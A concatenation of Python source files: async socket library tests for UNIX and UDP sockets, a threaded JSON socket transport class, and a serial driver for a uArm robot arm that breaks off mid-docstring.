ValueError, match="msglen must be a non-negative integer"
):
await stream.receive_fds(msglen, 0) # type: ignore[arg-type]
for maxfds in (0, "foo"):
with pytest.raises(
ValueError, match="maxfds must be a positive integer"
):
await stream.receive_fds(0, maxfds) # type: ignore[arg-type]
async def test_send_fds(
self, server_sock: socket.socket, socket_path: Path, tmp_path: Path
) -> None:
def serve() -> None:
fds = array.array("i")
client, _ = server_sock.accept()
msg, ancdata, *_ = client.recvmsg(10, socket.CMSG_LEN(2 * fds.itemsize))
client.close()
assert msg == b"test"
for cmsg_level, cmsg_type, cmsg_data in ancdata:
assert cmsg_level == socket.SOL_SOCKET
assert cmsg_type == socket.SCM_RIGHTS
fds.frombytes(
cmsg_data[: len(cmsg_data) - (len(cmsg_data) % fds.itemsize)]
)
text = ""
for fd in fds:
with os.fdopen(fd) as file:
text += file.read()
assert text == "Hello, World!"
path1 = tmp_path / "file1"
path2 = tmp_path / "file2"
path1.write_text("Hello, ")
path2.write_text("World!")
with path1.open() as file1, path2.open() as file2, fail_after(2):
assert isinstance(file1, io.TextIOWrapper)
assert isinstance(file2, io.TextIOWrapper)
async with await connect_unix(socket_path) as stream:
thread = Thread(target=serve, daemon=True)
thread.start()
await stream.send_fds(b"test", [file1, file2])
thread.join()
async def test_send_eof(
self, server_sock: socket.socket, socket_path: Path
) -> None:
def serve() -> None:
client, _ = server_sock.accept()
request = b""
while True:
data = client.recv(100)
request += data
if not data:
break
client.sendall(request[::-1])
client.close()
async with await connect_unix(socket_path) as stream:
thread = Thread(target=serve, daemon=True)
thread.start()
await stream.send(b"hello, ")
await stream.send(b"world\n")
await stream.send_eof()
response = await stream.receive()
thread.join()
assert response == b"\ndlrow ,olleh"
async def test_iterate(self, server_sock: socket.socket, socket_path: Path) -> None:
def serve() -> None:
client, _ = server_sock.accept()
client.sendall(b"bl")
time.sleep(0.05)
client.sendall(b"ah")
client.close()
thread = Thread(target=serve, daemon=True)
thread.start()
chunks = []
async with await connect_unix(socket_path) as stream:
async for chunk in stream:
chunks.append(chunk)
thread.join()
assert chunks == [b"bl", b"ah"]
async def test_send_fds_bad_args(
self, server_sock: socket.socket, socket_path: Path
) -> None:
async with await connect_unix(socket_path) as stream:
with pytest.raises(ValueError, match="message must not be empty"):
await stream.send_fds(b"", [0])
with pytest.raises(ValueError, match="fds must not be empty"):
await stream.send_fds(b"test", [])
async def test_concurrent_send(
self, server_sock: socket.socket, socket_path: Path
) -> None:
async def send_data() -> NoReturn:
while True:
await client.send(b"\x00" * 4096)
async with await connect_unix(socket_path) as client:
async with create_task_group() as tg:
tg.start_soon(send_data)
await wait_all_tasks_blocked()
with pytest.raises(BusyResourceError) as exc:
await client.send(b"foo")
exc.match("already writing to")
tg.cancel_scope.cancel()
async def test_concurrent_receive(
self, server_sock: socket.socket, socket_path: Path
) -> None:
async with await connect_unix(socket_path) as client:
async with create_task_group() as tg:
tg.start_soon(client.receive)
await wait_all_tasks_blocked()
try:
with pytest.raises(BusyResourceError) as exc:
await client.receive()
exc.match("already reading from")
finally:
tg.cancel_scope.cancel()
async def test_close_during_receive(
self, server_sock: socket.socket, socket_path: Path
) -> None:
async def interrupt() -> None:
await wait_all_tasks_blocked()
await stream.aclose()
async with await connect_unix(socket_path) as stream:
async with create_task_group() as tg:
tg.start_soon(interrupt)
with pytest.raises(ClosedResourceError):
await stream.receive()
async def test_receive_after_close(
self, server_sock: socket.socket, socket_path: Path
) -> None:
stream = await connect_unix(socket_path)
await stream.aclose()
with pytest.raises(ClosedResourceError):
await stream.receive()
async def test_send_after_close(
self, server_sock: socket.socket, socket_path: Path
) -> None:
stream = await connect_unix(socket_path)
await stream.aclose()
with pytest.raises(ClosedResourceError):
await stream.send(b"foo")
async def test_cannot_connect(self, socket_path: Path) -> None:
with pytest.raises(FileNotFoundError):
await connect_unix(socket_path)
@pytest.mark.skipif(
sys.platform == "win32", reason="UNIX sockets are not available on Windows"
)
class TestUNIXListener:
@pytest.fixture
def socket_path(self, tmp_path_factory: TempPathFactory) -> Path:
return tmp_path_factory.mktemp("unix").joinpath("socket")
@pytest.fixture(params=[False, True], ids=["str", "path"])
def socket_path_or_str(
self, request: SubRequest, socket_path: Path
) -> Union[Path, str]:
return socket_path if request.param else str(socket_path)
async def test_extra_attributes(self, socket_path: Path) -> None:
async with await create_unix_listener(socket_path) as listener:
raw_socket = listener.extra(SocketAttribute.raw_socket)
assert listener.extra(SocketAttribute.family) == socket.AF_UNIX
assert (
listener.extra(SocketAttribute.local_address)
== raw_socket.getsockname()
)
pytest.raises(
TypedAttributeLookupError, listener.extra, SocketAttribute.local_port
)
pytest.raises(
TypedAttributeLookupError,
listener.extra,
SocketAttribute.remote_address,
)
pytest.raises(
TypedAttributeLookupError, listener.extra, SocketAttribute.remote_port
)
async def test_accept(self, socket_path_or_str: Union[Path, str]) -> None:
async with await create_unix_listener(socket_path_or_str) as listener:
client = socket.socket(socket.AF_UNIX)
client.settimeout(1)
client.connect(str(socket_path_or_str))
stream = await listener.accept()
client.sendall(b"blah")
request = await stream.receive()
await stream.send(request[::-1])
assert client.recv(100) == b"halb"
client.close()
await stream.aclose()
async def test_socket_options(self, socket_path: Path) -> None:
async with await create_unix_listener(socket_path) as listener:
listener_socket = listener.extra(SocketAttribute.raw_socket)
assert listener_socket.family == socket.AddressFamily.AF_UNIX
listener_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 80000)
assert listener_socket.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) in (
80000,
160000,
)
client = socket.socket(listener_socket.family)
client.settimeout(1)
client.connect(listener_socket.getsockname())
async with await listener.accept() as stream:
assert stream.extra(SocketAttribute.raw_socket).gettimeout() == 0
assert stream.extra(SocketAttribute.family) == listener_socket.family
client.close()
async def test_send_after_eof(self, socket_path: Path) -> None:
async def handle(stream: SocketStream) -> None:
async with stream:
await stream.send(b"Hello\n")
async with await create_unix_listener(
socket_path
) as listener, create_task_group() as tg:
tg.start_soon(listener.serve, handle)
await wait_all_tasks_blocked()
with socket.socket(socket.AF_UNIX) as client:
client.connect(str(socket_path))
client.shutdown(socket.SHUT_WR)
client.setblocking(False)
with fail_after(1):
while True:
try:
message = client.recv(10)
except BlockingIOError:
await sleep(0)
else:
assert message == b"Hello\n"
break
tg.cancel_scope.cancel()
async def test_bind_twice(self, socket_path: Path) -> None:
"""Test that the previous socket is removed before binding to the path."""
for _ in range(2):
async with await create_unix_listener(socket_path):
pass
async def test_multi_listener(tmp_path_factory: TempPathFactory) -> None:
async def handle(stream: SocketStream) -> None:
client_addresses.append(stream.extra(SocketAttribute.remote_address))
event.set()
await stream.aclose()
client_addresses: List[Union[str, IPSockAddrType]] = []
listeners: List[Listener] = [await create_tcp_listener(local_host="localhost")]
if sys.platform != "win32":
socket_path = tmp_path_factory.mktemp("unix").joinpath("socket")
listeners.append(await create_unix_listener(socket_path))
expected_addresses: List[Union[str, IPSockAddrType]] = []
async with MultiListener(listeners) as multi_listener:
async with create_task_group() as tg:
tg.start_soon(multi_listener.serve, handle)
for listener in multi_listener.listeners:
event = Event()
local_address = listener.extra(SocketAttribute.local_address)
if (
sys.platform != "win32"
and listener.extra(SocketAttribute.family)
== socket.AddressFamily.AF_UNIX
):
assert isinstance(local_address, str)
stream: SocketStream = await connect_unix(local_address)
else:
assert isinstance(local_address, tuple)
stream = await connect_tcp(*local_address)
expected_addresses.append(stream.extra(SocketAttribute.local_address))
await event.wait()
await stream.aclose()
tg.cancel_scope.cancel()
assert client_addresses == expected_addresses
@pytest.mark.usefixtures("check_asyncio_bug")
class TestUDPSocket:
async def test_extra_attributes(self, family: AnyIPAddressFamily) -> None:
async with await create_udp_socket(
family=family, local_host="localhost"
) as udp:
raw_socket = udp.extra(SocketAttribute.raw_socket)
assert raw_socket.gettimeout() == 0
assert udp.extra(SocketAttribute.family) == family
assert (
udp.extra(SocketAttribute.local_address) == raw_socket.getsockname()[:2]
)
assert udp.extra(SocketAttribute.local_port) == raw_socket.getsockname()[1]
pytest.raises(
TypedAttributeLookupError, udp.extra, SocketAttribute.remote_address
)
pytest.raises(
TypedAttributeLookupError, udp.extra, SocketAttribute.remote_port
)
async def test_send_receive(self, family: AnyIPAddressFamily) -> None:
async with await create_udp_socket(
local_host="localhost", family=family
) as sock:
host, port = sock.extra(SocketAttribute.local_address) # type: ignore[misc]
await sock.sendto(b"blah", host, port)
request, addr = await sock.receive()
assert request == b"blah"
assert addr == sock.extra(SocketAttribute.local_address)
await sock.sendto(b"halb", host, port)
response, addr = await sock.receive()
assert response == b"halb"
assert addr == (host, port)
async def test_iterate(self, family: AnyIPAddressFamily) -> None:
async def serve() -> None:
async for packet, addr in server:
await server.send((packet[::-1], addr))
async with await create_udp_socket(
family=family, local_host="localhost"
) as server:
host, port = server.extra(SocketAttribute.local_address) # type: ignore[misc]
async with await create_udp_socket(
family=family, local_host="localhost"
) as client:
async with create_task_group() as tg:
tg.start_soon(serve)
await client.sendto(b"FOOBAR", host, port)
assert await client.receive() == (b"RABOOF", (host, port))
await client.sendto(b"123456", host, port)
assert await client.receive() == (b"654321", (host, port))
tg.cancel_scope.cancel()
@pytest.mark.skipif(
not hasattr(socket, "SO_REUSEPORT"), reason="SO_REUSEPORT option not supported"
)
async def test_reuse_port(self, family: AnyIPAddressFamily) -> None:
async with await create_udp_socket(
family=family, local_host="localhost", reuse_port=True
) as udp:
port = udp.extra(SocketAttribute.local_port)
assert port != 0
async with await create_udp_socket(
family=family, local_host="localhost", local_port=port, reuse_port=True
) as udp2:
assert port == udp2.extra(SocketAttribute.local_port)
async def test_concurrent_receive(self) -> None:
async with await create_udp_socket(
family=AddressFamily.AF_INET, local_host="localhost"
) as udp:
async with create_task_group() as tg:
tg.start_soon(udp.receive)
await wait_all_tasks_blocked()
try:
with pytest.raises(BusyResourceError) as exc:
await udp.receive()
exc.match("already reading from")
finally:
tg.cancel_scope.cancel()
async def test_close_during_receive(self) -> None:
async def close_when_blocked() -> None:
await wait_all_tasks_blocked()
await udp.aclose()
async with await create_udp_socket(
family=AddressFamily.AF_INET, local_host="localhost"
) as udp:
async with create_task_group() as tg:
tg.start_soon(close_when_blocked)
with pytest.raises(ClosedResourceError):
await udp.receive()
async def test_receive_after_close(self) -> None:
udp = await create_udp_socket(
family=AddressFamily.AF_INET, local_host="localhost"
)
await udp.aclose()
with pytest.raises(ClosedResourceError):
await udp.receive()
async def test_send_after_close(self) -> None:
udp = await create_udp_socket(
family=AddressFamily.AF_INET, local_host="localhost"
)
host, port = udp.extra(SocketAttribute.local_address) # type: ignore[misc]
await udp.aclose()
with pytest.raises(ClosedResourceError):
await udp.sendto(b"foo", host, port)
async def test_create_unbound_socket(self, family: AnyIPAddressFamily) -> None:
"""Regression test for #360."""
async with await create_udp_socket(family=family) as udp:
local_address = cast(
IPSockAddrType, udp.extra(SocketAttribute.local_address)
)
assert local_address[1] > 0
@pytest.mark.usefixtures("check_asyncio_bug")
class TestConnectedUDPSocket:
async def test_extra_attributes(self, family: AnyIPAddressFamily) -> None:
async with await create_connected_udp_socket(
"localhost", 5000, family=family
) as udp:
raw_socket = udp.extra(SocketAttribute.raw_socket)
assert udp.extra(SocketAttribute.family) == family
assert (
udp.extra(SocketAttribute.local_address) == raw_socket.getsockname()[:2]
)
assert udp.extra(SocketAttribute.local_port) == raw_socket.getsockname()[1]
assert (
udp.extra(SocketAttribute.remote_address)
== raw_socket.getpeername()[:2]
)
assert udp.extra(SocketAttribute.remote_port) == 5000
async def test_send_receive(self, family: AnyIPAddressFamily) -> None:
async with await create_udp_socket(
family=family, local_host="localhost"
) as udp1:
host, port = udp1.extra(SocketAttribute.local_address) # type: ignore[misc]
async with await create_connected_udp_socket(
host, port, local_host="localhost", family=family
) as udp2:
host, port = udp2.extra(SocketAttribute.local_address) # type: ignore[misc]
await udp2.send(b"blah")
request = await udp1.receive()
assert request == (b"blah", (host, port))
await udp1.sendto(b"halb", host, port)
response = await udp2.receive()
assert response == b"halb"
async def test_iterate(self, family: AnyIPAddressFamily) -> None:
async def serve() -> None:
async for packet in udp2:
await udp2.send(packet[::-1])
async with await create_udp_socket(
family=family, local_host="localhost"
) as udp1:
host, port = udp1.extra(SocketAttribute.local_address) # type: ignore[misc]
async with await create_connected_udp_socket(host, port) as udp2:
host, port = udp2.extra(SocketAttribute.local_address) # type: ignore[misc]
async with create_task_group() as tg:
tg.start_soon(serve)
await udp1.sendto(b"FOOBAR", host, port)
assert await udp1.receive() == (b"RABOOF", (host, port))
await udp1.sendto(b"123456", host, port)
assert await udp1.receive() == (b"654321", (host, port))
tg.cancel_scope.cancel()
@pytest.mark.skipif(
not hasattr(socket, "SO_REUSEPORT"), reason="SO_REUSEPORT option not supported"
)
async def test_reuse_port(self, family: AnyIPAddressFamily) -> None:
async with await create_connected_udp_socket(
"localhost", 6000, family=family, local_host="localhost", reuse_port=True
) as udp:
port = udp.extra(SocketAttribute.local_port)
assert port != 0
async with await create_connected_udp_socket(
"localhost",
6001,
family=family,
local_host="localhost",
local_port=port,
reuse_port=True,
) as udp2:
assert port == udp2.extra(SocketAttribute.local_port)
async def test_concurrent_receive(self) -> None:
async with await create_connected_udp_socket(
"localhost", 5000, local_host="localhost", family=AddressFamily.AF_INET
) as udp:
async with create_task_group() as tg:
tg.start_soon(udp.receive)
await wait_all_tasks_blocked()
try:
with pytest.raises(BusyResourceError) as exc:
await udp.receive()
exc.match("already reading from")
finally:
tg.cancel_scope.cancel()
async def test_close_during_receive(self) -> None:
async def close_when_blocked() -> None:
await wait_all_tasks_blocked()
await udp.aclose()
async with await create_connected_udp_socket(
"localhost", 5000, local_host="localhost", family=AddressFamily.AF_INET
) as udp:
async with create_task_group() as tg:
tg.start_soon(close_when_blocked)
with pytest.raises(ClosedResourceError):
await udp.receive()
async def test_receive_after_close(self, family: AnyIPAddressFamily) -> None:
udp = await create_connected_udp_socket(
"localhost", 5000, local_host="localhost", family=family
)
await udp.aclose()
with pytest.raises(ClosedResourceError):
await udp.receive()
async def test_send_after_close(self, family: AnyIPAddressFamily) -> None:
udp = await create_connected_udp_socket(
"localhost", 5000, local_host="localhost", family=family
)
await udp.aclose()
with pytest.raises(ClosedResourceError):
await udp.send(b"foo")
@pytest.mark.network
async def test_getaddrinfo() -> None:
# IDNA 2003 gets this wrong
correct = await getaddrinfo("faß.de", 0)
wrong = await getaddrinfo("fass.de", 0)
assert correct != wrong
@pytest.mark.parametrize(
"sock_type", [socket.SOCK_STREAM, socket.SocketKind.SOCK_STREAM]
)
async def test_getaddrinfo_ipv6addr(
sock_type: Literal[socket.SocketKind.SOCK_STREAM],
) -> None:
# IDNA trips up over raw IPv6 addresses
proto = 0 if platform.system() == "Windows" else 6
assert await getaddrinfo("::1", 0, type=sock_type) == [
(
socket.AddressFamily.AF_INET6,
socket.SocketKind.SOCK_STREAM,
proto,
"",
("::1", 0),
)
]
async def test_getnameinfo() -> None:
expected_result = socket.getnameinfo(("127.0.0.1", 6666), 0)
result = await getnameinfo(("127.0.0.1", 6666))
assert result == expected_result
|
transport.py | import socket
from threading import Thread, Lock
from json import dumps as dictToJson
from json import loads as jsonToDict
from json.decoder import JSONDecodeError
from .common import encodeImg, decodeImg, generateSocket
#################
### CONSTANTS ###
#################
from .constants import ACK, NEWLINE, IMG_MSG_S, IMG_MSG_E
from .constants import IMAGE, TYPE, DATA
from .constants import PORT, TIMEOUT, SIZE
from .constants import STATUS, CLOSING, NAME_CONN
from .constants import MAX_RETRIES
###############################################################
#######################
### TRANSPORT CLASS ###
#######################
class Transport:
TYPE_LOCAL = 1
TYPE_REMOTE = 2
def __init__(self, name, timeout=TIMEOUT, size=SIZE):
self.name = name
self.socket = None
self.addr, self.port = None, None
self.canWrite = True
self.channels = {}
self.timeout = timeout
self.size = size
self.stopped = False
self.opened = False
self.type = None
self.lock = Lock()
def receive(self, socket, addr, port):
self.socket = socket
self.addr = addr
self.port = port
self.socket.settimeout(self.timeout)
self.type = Transport.TYPE_REMOTE
self.opened = True
self.__start()
def __start(self):
if self.socket is None:
raise RuntimeError("Connection started without socket")
return
Thread(target=self.__run, args=()).start()
return self
def __run(self):
tmp = ""
while True:
if self.stopped:
self.socket.close()
return
try:
tmp += self.socket.recv(self.size).decode()
except socket.timeout:
continue
except OSError:
self.close()
if tmp != "":
data = tmp.split("\n")
for i in range(len(data)):
try:
msg = jsonToDict(data[i])
except JSONDecodeError:
continue
self.__cascade(msg[TYPE], msg[DATA])
if msg[TYPE] == IMAGE:
self.channels[IMAGE] = decodeImg(msg[DATA])
else:
self.channels[msg[TYPE]] = msg[DATA]
data[i] = ""
tmp = "".join(data)
def __cascade(self, mtype, mdata):
if mtype == ACK:
self.canWrite = True
if mtype == STATUS:
if mdata == CLOSING:
self.__close()
if mtype == NAME_CONN:
self.name = mdata
if mtype == IMAGE:
self.write(ACK, ACK)
def __close(self):
self.opened = False
self.stopped = True
#################
### INTERFACE ###
#################
def connect(self, name, addr, port):
self.name = name
self.addr = addr
self.port = port
while True:
try:
self.socket = generateSocket(self.timeout)
self.socket.connect((self.addr, self.port))
break
except socket.timeout:
continue
except socket.gaierror:
continue
except OSError as e:
if type(e) == ConnectionRefusedError:
continue
raise RuntimeError("Socket address in use: {}".format(e))
return
self.type = Transport.TYPE_LOCAL
self.opened = True
self.write(NAME_CONN, self.name)
self.__start()
def get(self, channel):
with self.lock:
if channel in self.channels.keys():
return self.channels[channel]
return None
def getImg(self):
if IMAGE in self.channels.keys():
return self.channels[IMAGE]
return None
def write(self, channel, data):
if self.opened:
with self.lock:
msg = {TYPE: channel.replace("\n", ""), DATA: data.replace("\n", "")}
self.socket.sendall(dictToJson(msg).encode() + NEWLINE)
def writeImg(self, data):
if self.canWrite and self.opened:
with self.lock:
self.canWrite = False
self.socket.sendall(IMG_MSG_S + encodeImg(data) + IMG_MSG_E + NEWLINE)
def close(self):
try:
self.write(STATUS, CLOSING)
except OSError:
pass
self.__close()
|
uarm.py | from __future__ import print_function
import serial
from . import protocol
from .log import DEBUG, INFO, ERROR, printf, init_logger, set_default_logger, close_logger
from . import PY3
import time
import threading
from .tools.list_uarms import uarm_ports, get_port_property
if PY3:
from queue import Queue, LifoQueue, Empty
else:
from Queue import Queue, LifoQueue, Empty
# ################################### Exception ################################
def catch_exception(func):
def decorator(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
printf("{} - {} - {}".format(type(e).__name__, func.__name__, e), ERROR)
return decorator
class UArmConnectException(Exception):
def __init__(self, errno, message=None):
"""
uArm Connect Exception
:param errno: 0 Unable to connect uArm, 1 unknown firmware version, 2 unsupported uArm Firmware version
:param message:
"""
if message is None:
self.message = ""
else:
self.message = message
self.errno = errno
if self.errno == 0:
self.error = "Unable to connect uArm"
elif self.errno == 1:
self.error = "Unknown Firmware Version"
elif self.errno == 2:
self.error = "Unsupported uArm Firmware Version"
elif self.errno == 3:
self.error = "No available uArm Port"
elif self.errno == 4:
self.error = "uArm is not connected"
else:
self.error = "Not Defined Error"
def __str__(self):
return repr(self.error + "-" + self.message)
class UArm(object):
def __init__(self, port_name=None, timeout=2, debug=False, logger=None):
"""
:param port_name: UArm Serial Port name, if no port provide, will try first port we detect
:param logger: if no logger provide, will create a logger by default
:param debug: if Debug is True, create a Debug Logger by default
:param timeout: default timeout is 5 sec.
:raise UArmConnectException
| if no port provide, we will detect all connected uArm serial devices.
| please reference `pyuarm.tools.list_uarms`
| port is a device name: depending on operating system.
| eg. `/dev/ttyUSB0` on GNU/Linux or `COM3` on Windows.
| logger will display all info/debug/error/warning messages.
"""
self.__init_property()
self.timeout = timeout
if port_name is not None:
self.port_name = port_name
if logger is None:
set_default_logger(debug)
else:
init_logger(logger)
def __init_property(self):
self.timeout = None
self.port_name = None
self.__data_buf = None
self.__position_queue = None
self.__menu_button_queue = None
self.__play_button_queue = None
self.__send_queue = None
self.__firmware_version = None
self.__hardware_version = None
self.__isReady = None
self.__receive_thread = None
self.__send_thread = None
self.serial_id = None
self.msg_buff = None
self.__serial = None
self.__reader_thread = None
self.__transport = None
self.__protocol = None
self.port = None
self.__connect_flag = False
def __init_serial_core(self):
if PY3:
from .threaded import UArmSerial, UArmReaderThread
self.__reader_thread = UArmReaderThread(self.__serial, UArmSerial, self.__data_buf)
self.__reader_thread.start()
self.__reader_thread.connect()
self.__transport, self.__protocol = self.__reader_thread.connect()
else:
self.__connect_flag = True
def __close_serial_core(self):
if PY3:
self.__reader_thread.stop()
else:
self.__connect_flag = False
@catch_exception
def connect(self):
"""
This function will open the port immediately. Function will wait for the READY Message for 5 secs.
| Once received READY message, will finish connection.
"""
if self.port_name is None:
ports = uarm_ports()
if len(ports) > 0:
self.port_name = ports[0]
else:
raise UArmConnectException(3)
self.__data_buf = []
self.__position_queue = LifoQueue()
self.__menu_button_queue = LifoQueue()
self.__play_button_queue = LifoQueue()
self.__send_queue = Queue()
self.__firmware_version = None
self.__hardware_version = None
self.__isReady = False
self.port = get_port_property(self.port_name)
self.__receive_thread = threading.Thread(target=self.__receive_thread_process)
self.__send_thread = threading.Thread(target=self.__send_thread_process)
self.__receive_thread.setDaemon(True)
self.__send_thread.setDaemon(True)
self.serial_id = 1
self.msg_buff = {}
self.__serial = serial.Serial(baudrate=115200, timeout=0.1)
try:
self.__serial.port = self.port.device
printf("Connecting from port - {0}...".format(self.port.device))
self.__serial.open()
self.__init_serial_core()
self.__connect()
except serial.SerialException as e:
raise UArmConnectException(0, "port: {}, Error: {}".format(self.port.device, e.strerror))
def __connect(self):
start_time = time.time()
while time.time() - start_time < 5:
if self.connection_state:
break
self.__receive_thread.start()
self.__send_thread.start()
start_time = time.time()
while time.time() - start_time < self.timeout:
if self.__isReady:
break
@property
def connection_state(self):
"""
Return the uArm Connection status.
:return: boolean
"""
if PY3:
if self.__protocol is not None:
return self.__protocol.get_connect_status()
else:
return False
else:
if self.__serial is not None:
return self.__serial.is_open and self.__connect_flag
else:
return False
@catch_exception
def disconnect(self):
"""
Disconnect the serial connection, terminate all queue and thread
"""
self.__close_serial_core()
self.__serial.close()
printf("Disconnect from {}".format(self.port_name))
@catch_exception
def close(self):
"""
Release all resources:
| - logger
| - queue
| - thread
"""
if self.connection_state:
self.disconnect()
close_logger()
self.__init_property()
def __process_line(self, line):
if line is not None:
if line.startswith("$"):
values = line.split(' ')
msg_id = int(values[0].replace('$', ''))
self.msg_buff[msg_id] = values[1:]
printf("MSG Received: {}".format(line), DEBUG)
elif line.startswith(protocol.READY):
printf("Received MSG: {}".format(line), DEBUG)
self.__isReady = True
elif line.startswith(protocol.REPORT_POSITION_PREFIX):
printf("POSITION REPORT: {}".format(line), DEBUG)
values = line.split(' ')
pos_array = [float(values[1][1:]), float(values[2][1:]),
float(values[3][1:])]
self.__position_queue.put(pos_array, block=False)
def __receive_thread_process(self):
"""
This Function is for receiving thread. Under Python3.x we will use `pyserial threading`_ to manage
the send/receive logic.
| This thread will be finished if serial connection is end.
.. _pyserial threading: http://pyserial.readthedocs.io/en/latest/pyserial_api.html#module-serial.threaded
"""
while self.connection_state:
try:
line = None
if PY3:
if len(self.__data_buf) > 0:
line = self.__data_buf.pop().rstrip('\r\n')
else:
line = self.__serial.readline().rstrip('\r\n')
if not line:
continue
self.__process_line(line)
except serial.SerialException as e:
printf("Receive Process Fatal - {}".format(e), ERROR)
if not PY3:
self.__connect_flag = False
except Exception as e:
printf("Receive Process {} - {}".format(type(e).__name__, e), ERROR)
time.sleep(0.001)
# Make Sure all queues were release
self.__position_queue.join()
self.__play_button_queue.join()
self.__menu_button_queue.join()
def __send_thread_process(self):
"""
This function is for sending thread function.
| All functions which start with ``get_`` and with ``wait=True`` function will send out with this thread.
| thread will be finished if serial connection is end.
"""
while self.connection_state:
try:
item = self.__send_queue.get()
if item is None:
break
msg_id = item['id']
msg_content = item['msg']
msg = '#{} {}'.format(msg_id, msg_content)
if PY3:
self.__protocol.write_line(msg)
else:
self.__serial.write(msg)
self.__serial.write('\n')
printf("Send {}".format(msg), DEBUG)
start_time = time.time()
while time.time() - start_time < self.timeout:
if msg_id in self.msg_buff.keys():
break
self.__send_queue.task_done()
except Exception as e:
printf("Error: {}".format(e), ERROR)
time.sleep(0.001)
# Make Sure all queues were release
self.__send_queue.join()
def __gen_serial_id(self):
"""
Generate a serial id to identify the message.
:return: Integer serial id
"""
if self.serial_id == 65535: # Maximum id
self.serial_id = 1
else:
self.serial_id += 1
return self.serial_id
def send_and_receive(self, msg):
"""
This function will block until receive the response message.
:param msg: String Serial Command
:return: (Integer msg_id, String response) and None if no response
"""
if self.connection_state:
msg_id = self.__gen_serial_id()
item = {'id': msg_id, 'msg': msg}
self.__send_queue.put(item)
start_time = time.time()
while time.time() - start_time < self.timeout:
if msg_id in self.msg_buff.keys():
return msg_id, self.msg_buff[msg_id]
# print("duration: {}".format(time.time() - start_time))
return None, None
else:
raise UArmConnectException(4)
def send_msg(self, msg):
"""
This function will send out the message and return the serial_id immediately.
:param msg: String, Serial Command
:return:
"""
if self.connection_state:
serial_id = self.__gen_serial_id()
_msg = '#{} {}'.format(serial_id, msg)
if PY3:
self.__protocol.write_line(_msg)
else:
self.__serial.write(_msg)
self.__serial.write('\n')
printf("Send #{} {}".format(serial_id, msg), DEBUG)
return serial_id
else:
raise UArmConnectException(4)
# -------------------------------------------------------- Commands ---------------------------------------------------#
def reset(self):
"""
Reset include below action:
- Attach all servos
- Move to default position (0, 150, 150) with speed 100mm/min
- Turn off Pump/Gripper
- Set Wrist Servo to Angle 90
:return:
"""
self.set_servo_attach()
time.sleep(0.1)
self.set_position(0, 150, 150, speed=100, wait=True)
self.set_pump(False)
self.set_gripper(False)
self.set_wrist(90)
# -------------------------------------------------------- Get Commands -----------------------------------------------#
@property
@catch_exception
def firmware_version(self):
"""
Get the firmware version.
Protocol Cmd: ``protocol.GET_FIRMWARE_VERSION``
:return: firmware version, if failed return None
"""
if self.__firmware_version is not None:
return self.__firmware_version
else:
try:
cmd = protocol.GET_FIRMWARE_VERSION
serial_id, response = self.send_and_receive(cmd)
if response is not None:
if response[0] == protocol.OK:
self.__firmware_version = response[1].replace('V', '')
return self.__firmware_version
return None
except Exception as e:
printf("Error: {}".format(e), ERROR)
@property
@catch_exception
def hardware_version(self):
"""
Get the Product version.
Protocol Cmd: `protocol.GET_HARDWARE_VERSION``
:return: firmware version, if failed return None
"""
if self.__hardware_version is not None:
return self.__hardware_version
else:
try:
cmd = protocol.GET_HARDWARE_VERSION
serial_id, response = self.send_and_receive(cmd)
if response is not None:
if response[0] == protocol.OK:
self.__hardware_version = response[1].replace('V', '')
return self.__hardware_version
return None
except Exception as e:
printf("Error: {}".format(e), ERROR)
@catch_exception
def get_position(self):
"""
Get Current uArm position (x,y,z)
:return: Float Array. Returns an array of the format [x, y, z] of the robots current location
"""
serial_id, response = self.send_and_receive(protocol.GET_COOR)
if response is None:
printf("No Message response {}".format(serial_id), ERROR)
return None
if response[0] == protocol.OK:
x = float(response[1][1:])
y = float(response[2][1:])
z = float(response[3][1:])
coordinate = [x, y, z]
return coordinate
return None
@catch_exception
def get_is_moving(self):
"""
Get the uArm current moving status.
:return: Boolean True or False
"""
serial_id, response = self.send_and_receive(protocol.GET_IS_MOVE)
if response is None:
printf("No Message response {}".format(serial_id), ERROR)
return None
if response[0] == protocol.OK:
v = int(response[1][1:])
if v == 0:
return False
elif v == 1:
return True
@catch_exception
def get_polar(self):
"""
get Polar coordinate
:return: Float Array. Return an array of the format [rotation, stretch, height]
"""
serial_id, response = self.send_and_receive(protocol.GET_POLAR)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
stretch = float(response[1][1:])
rotation = float(response[2][1:])
height = float(response[3][1:])
polar = [rotation, stretch, height]
return polar
else:
return None
@catch_exception
def get_tip_sensor(self):
"""
Get Status from Tip Sensor
:return: True On/ False Off
"""
serial_id, response = self.send_and_receive(protocol.GET_TIP_SENSOR)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
if response[1] == 'V0':
return True
elif response[1] == 'V1':
return False
else:
return None
@catch_exception
def get_servo_angle(self, servo_num=None):
"""
Get Servo Angle
:param servo_num: if servo_num not provide, will return a array. for all servos, servo 0
, servo 1, servo 2, servo 3
:return:
"""
serial_id, response = self.send_and_receive(protocol.GET_SERVO_ANGLE)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
servo_0 = float(response[1][1:])
servo_1 = float(response[2][1:])
servo_2 = float(response[3][1:])
servo_3 = float(response[4][1:])
servo_array = [servo_0, servo_1, servo_2, servo_3]
if servo_num is None:
return servo_array
elif servo_num == 0:
return servo_0
elif servo_num == 1:
return servo_1
elif servo_num == 2:
return servo_2
elif servo_num == 3:
return servo_3
else:
return None
@catch_exception
def get_analog(self, pin):
"""
Get Analog Value from specific PIN
:param pin:
:return:
"""
try:
cmd = protocol.GET_ANALOG.format(pin)
serial_id, response = self.send_and_receive(cmd)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
val = "".join(response[1:])[1:]
return int(float(val))
else:
return None
except Exception as e:
printf("Error {}".format(e))
return None
@catch_exception
def get_digital(self, pin):
"""
Get Digital Value from specific PIN.
:param pin:
:return:
"""
try:
cmd = protocol.GET_DIGITAL.format(pin)
serial_id, response = self.send_and_receive(cmd)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
if response[1] == 'V0':
return True
elif response[1] == 'V1':
return False
else:
return None
except Exception as e:
printf("Error {}".format(e))
return None
@catch_exception
def get_rom_data(self, address, data_type=protocol.EEPROM_DATA_TYPE_BYTE):
"""
Get DATA From EEPROM
:param address: 0 - 2048
